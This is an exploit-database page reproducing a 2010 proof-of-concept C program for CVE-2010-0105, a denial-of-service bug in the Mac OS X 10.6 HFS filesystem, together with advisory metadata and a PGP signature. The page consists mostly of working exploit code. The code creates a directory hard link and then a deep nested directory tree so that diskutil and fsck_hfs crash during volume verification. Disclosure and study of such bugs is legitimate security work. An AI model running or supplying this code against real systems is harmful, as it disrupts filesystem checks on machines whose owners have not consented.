Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)

🗓️ 24 Apr 2010 00:00:00Reported by Maksymilian ArciemowiczType

Apple Mac OSX 10.6 HFS FileSystem DoS attac

Reporter	Title	Published	Views	Family All 34
0day.today	MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability	24 Apr 201000:00	–	zdt
0day.today	MacOS X 10.9 Hard Link Memory Corruption	8 Apr 201400:00	–	zdt
0day.today	Mac OS X 10.11 FTS Deep Structure of the File System Buffer Overflow Exploit	8 Dec 201500:00	–	zdt
Tenable Nessus	Mac OS X 10.6 < 10.6.5 Multiple Vulnerabilities	11 Nov 201000:00	–	nessus
Tenable Nessus	Mac OS X 10.6 < 10.6.5 Multiple Vulnerabilities	11 Nov 201000:00	–	nessus
Tenable Nessus	Mac OS X 10.6.x < 10.6.5 Multiple Vulnerabilities	10 Nov 201000:00	–	nessus
Tenable Nessus	Mac OS X Multiple Vulnerabilities (Security Update 2010-007)	10 Nov 201000:00	–	nessus
Circl	CVE-2010-0105	24 Apr 201000:00	–	circl
CVE	CVE-2010-0105	27 Apr 201015:00	–	cve
Cvelist	CVE-2010-0105	27 Apr 201015:00	–	cvelist

// -----BEGIN PGP SIGNED MESSAGE-----
// Hash: SHA1
/* 	Proof of Concept for CVE-2010-0105
	MacOS X 10.6 hfs file system attack (Denial of Service)
	by Maksymilian Arciemowicz from SecurityReason.com

	http://securityreason.com/achievement_exploitalert/15
	
	NOTE:
	
	This DoS will be localized in phase
	
	Checking multi-linked directories

	So we need activate it with line
	
		connlink("C/C","CX");

	Now we need create PATH_MAX/2 directory tree to make overflow.

	and we should get diskutil and fsck_hfs exit with sig=8
	
	~ x$ diskutil verifyVolume /Volumes/max2
	Started filesystem verification on disk0s3 max2
	Performing live verification
	Checking Journaled HFS Plus volume
	Checking extents overflow file
	Checking catalog file
	Checking multi-linked files
	Checking catalog hierarchy
	Checking extended attributes file
	Checking multi-linked directories
	Maximum nesting of folders and directory hard links reached
	The volume max2 could not be verified completely
	Error: -9957: Filesystem verify or repair failed
	Underlying error: 8: POSIX reports: Exec format error
	
		
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>


int createdir(char *name){
	if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
|S_IXUSR)){
		printf("Can`t create %s", name);
		exit(1);}
		else
		return 0;	
}

int comein(char *name){
	if(0!=chdir(name)){
		printf("Can`t chdir in to %s", name);
		exit(1);}
		else
		return 0;	
}

int connlink(a,b)
char *a,*b;
{
	if(0!=link(a,b)){
		printf("Can`t create link %s => %s",a,b);
		exit(1);}
		else
		return 0;	
}

int main(int argc,char *argv[]){
	
 	int level;
	FILE *fp;
	
	if(argc==2) {
		level=atoi(argv[1]);
	}else{
		level=512; //default
	}
	createdir("C"); //create hardlink
	createdir("C/C"); //create hardlink
	
	connlink("C/C","CX"); //we need use to checking multi-linked directorie

	comein("C");
	
	while(level--)
			printf("Level: %i mkdir:%i chdir:%i\n",level,
			createdir("C"),
			comein("C"));		
	
	
	printf("check diskutil verifyVolume /\n");
	return 0;
}
/*
- -- 
Best Regards,
- ------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<[email protected]>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkvTTQsACgkQpiCeOKaYa9bHwACfSRqy8xJbJBGFvLbLIjabxMkI
to4AoMMetii9Gc7EyOK7/3+QP4ynP5kY
=IML/
-----END PGP SIGNATURE-----
*/

24 Apr 2010 00:00Current

6.9Medium risk

Vulners AI Score6.9

CVSS 24.9

EPSS0.00319